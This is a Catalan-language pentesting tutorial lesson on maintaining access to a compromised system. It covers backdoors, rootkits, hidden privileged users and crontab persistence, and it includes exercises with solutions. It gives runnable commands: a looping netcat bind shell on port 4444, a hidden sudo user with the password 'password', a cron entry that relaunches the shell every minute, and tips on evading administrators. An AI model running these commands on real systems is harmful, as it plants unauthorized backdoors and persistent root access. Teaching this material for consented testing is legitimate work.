El manteniment de l'accés és una fase crucial en el procés de pentesting, ja que permet als atacants mantenir el control sobre un sistema compromès durant un període prolongat. Aquesta fase implica la implementació de mecanismes que permetin l'accés remot i la persistència en el sistema, fins i tot després de reinicis o altres intents de neteja per part dels administradors del sistema.

Objectius del Manteniment de l'Accés

  • Persistència: Assegurar que l'accés es mantingui fins i tot després de reinicis del sistema o altres accions de manteniment.
  • Accés remot: Configurar mecanismes per accedir al sistema de manera remota en qualsevol moment.
  • Evasió de detecció: Implementar tècniques per evitar la detecció per part de sistemes de seguretat i administradors.

Tècniques Comunes de Manteniment de l'Accés

  1. Backdoors

Les backdoors són mecanismes que permeten l'accés remot al sistema sense necessitat d'autenticació. Poden ser programes o scripts que s'executen en segon pla.

Exemple de codi:

# Exemple d'una backdoor simple en Bash
while true; do
  nc -lvp 4444 -e /bin/bash
done

Explicació:

  • nc -lvp 4444 -e /bin/bash: Utilitza netcat per escoltar en el port 4444 i executar /bin/bash quan es connecti algú.

  1. Rootkits

Els rootkits són eines que permeten als atacants mantenir l'accés al sistema amagant la seva presència i les seves activitats.

Tipus de Rootkits:

  • Kernel-level rootkits: Modifiquen el nucli del sistema operatiu per amagar processos, fitxers i connexions de xarxa.
  • User-level rootkits: Substitueixen binaris del sistema per versions malicioses que amaguen l'activitat de l'atacant.

  1. Creació d'Usuaris Ocults

Crear usuaris amb privilegis elevats que no siguin fàcilment detectables pels administradors.

Exemple de codi:

# Afegeix un usuari ocult amb privilegis de root
useradd -m -p $(openssl passwd -1 'password') -s /bin/bash hiddenuser
usermod -aG sudo hiddenuser

Explicació:

  • useradd -m -p $(openssl passwd -1 'password') -s /bin/bash hiddenuser: Crea un usuari amb el nom hiddenuser i la contrasenya password.
  • usermod -aG sudo hiddenuser: Afegeix l'usuari hiddenuser al grup sudo per obtenir privilegis de root.

  1. Modificació de Fitxers de Configuració

Modificar fitxers de configuració per assegurar que els serveis maliciosos s'iniciïn automàticament amb el sistema.

Exemple de codi:

# Afegeix una entrada al crontab per executar una backdoor cada minut
echo "* * * * * /usr/bin/nc -lvp 4444 -e /bin/bash" >> /etc/crontab

Explicació:

  • echo "* * * * * /usr/bin/nc -lvp 4444 -e /bin/bash" >> /etc/crontab: Afegeix una entrada al crontab per executar la backdoor cada minut.

Exercicis Pràctics

Exercici 1: Crear una Backdoor Simple

  1. Utilitza netcat per crear una backdoor que escolti en un port específic.
  2. Prova de connectar-te a la backdoor des d'un altre sistema.

Solució:

# En el sistema compromès
nc -lvp 4444 -e /bin/bash

# En el sistema de l'atacant
nc <IP_del_sistema_compromès> 4444

Exercici 2: Crear un Usuari Ocult

  1. Crea un usuari ocult amb privilegis de root.
  2. Verifica que l'usuari pot executar comandes amb privilegis elevats.

Solució:

# Crear l'usuari ocult
useradd -m -p $(openssl passwd -1 'password') -s /bin/bash hiddenuser
usermod -aG sudo hiddenuser

# Verificar els privilegis
su - hiddenuser
sudo whoami

Errors Comuns i Consells

Errors Comuns

  • No comprovar la persistència: No verificar si els mecanismes de manteniment de l'accés funcionen després de reinicis del sistema.
  • Deixar rastres evidents: Utilitzar noms d'usuaris o fitxers que són fàcilment detectables pels administradors.

Consells

  • Utilitza noms discrets: Tria noms d'usuaris i fitxers que no cridin l'atenció.
  • Verifica la persistència: Prova els mecanismes de manteniment de l'accés després de reinicis i altres accions de manteniment.

Conclusió

El manteniment de l'accés és una fase crítica en el pentesting que permet als atacants mantenir el control sobre un sistema compromès. Utilitzant tècniques com les backdoors, els rootkits, la creació d'usuaris ocults i la modificació de fitxers de configuració, els pentesters poden assegurar-se que poden accedir al sistema en qualsevol moment. És important practicar aquestes tècniques de manera ètica i legal, i sempre amb el consentiment del propietari del sistema.

© Copyright 2024. Tots els drets reservats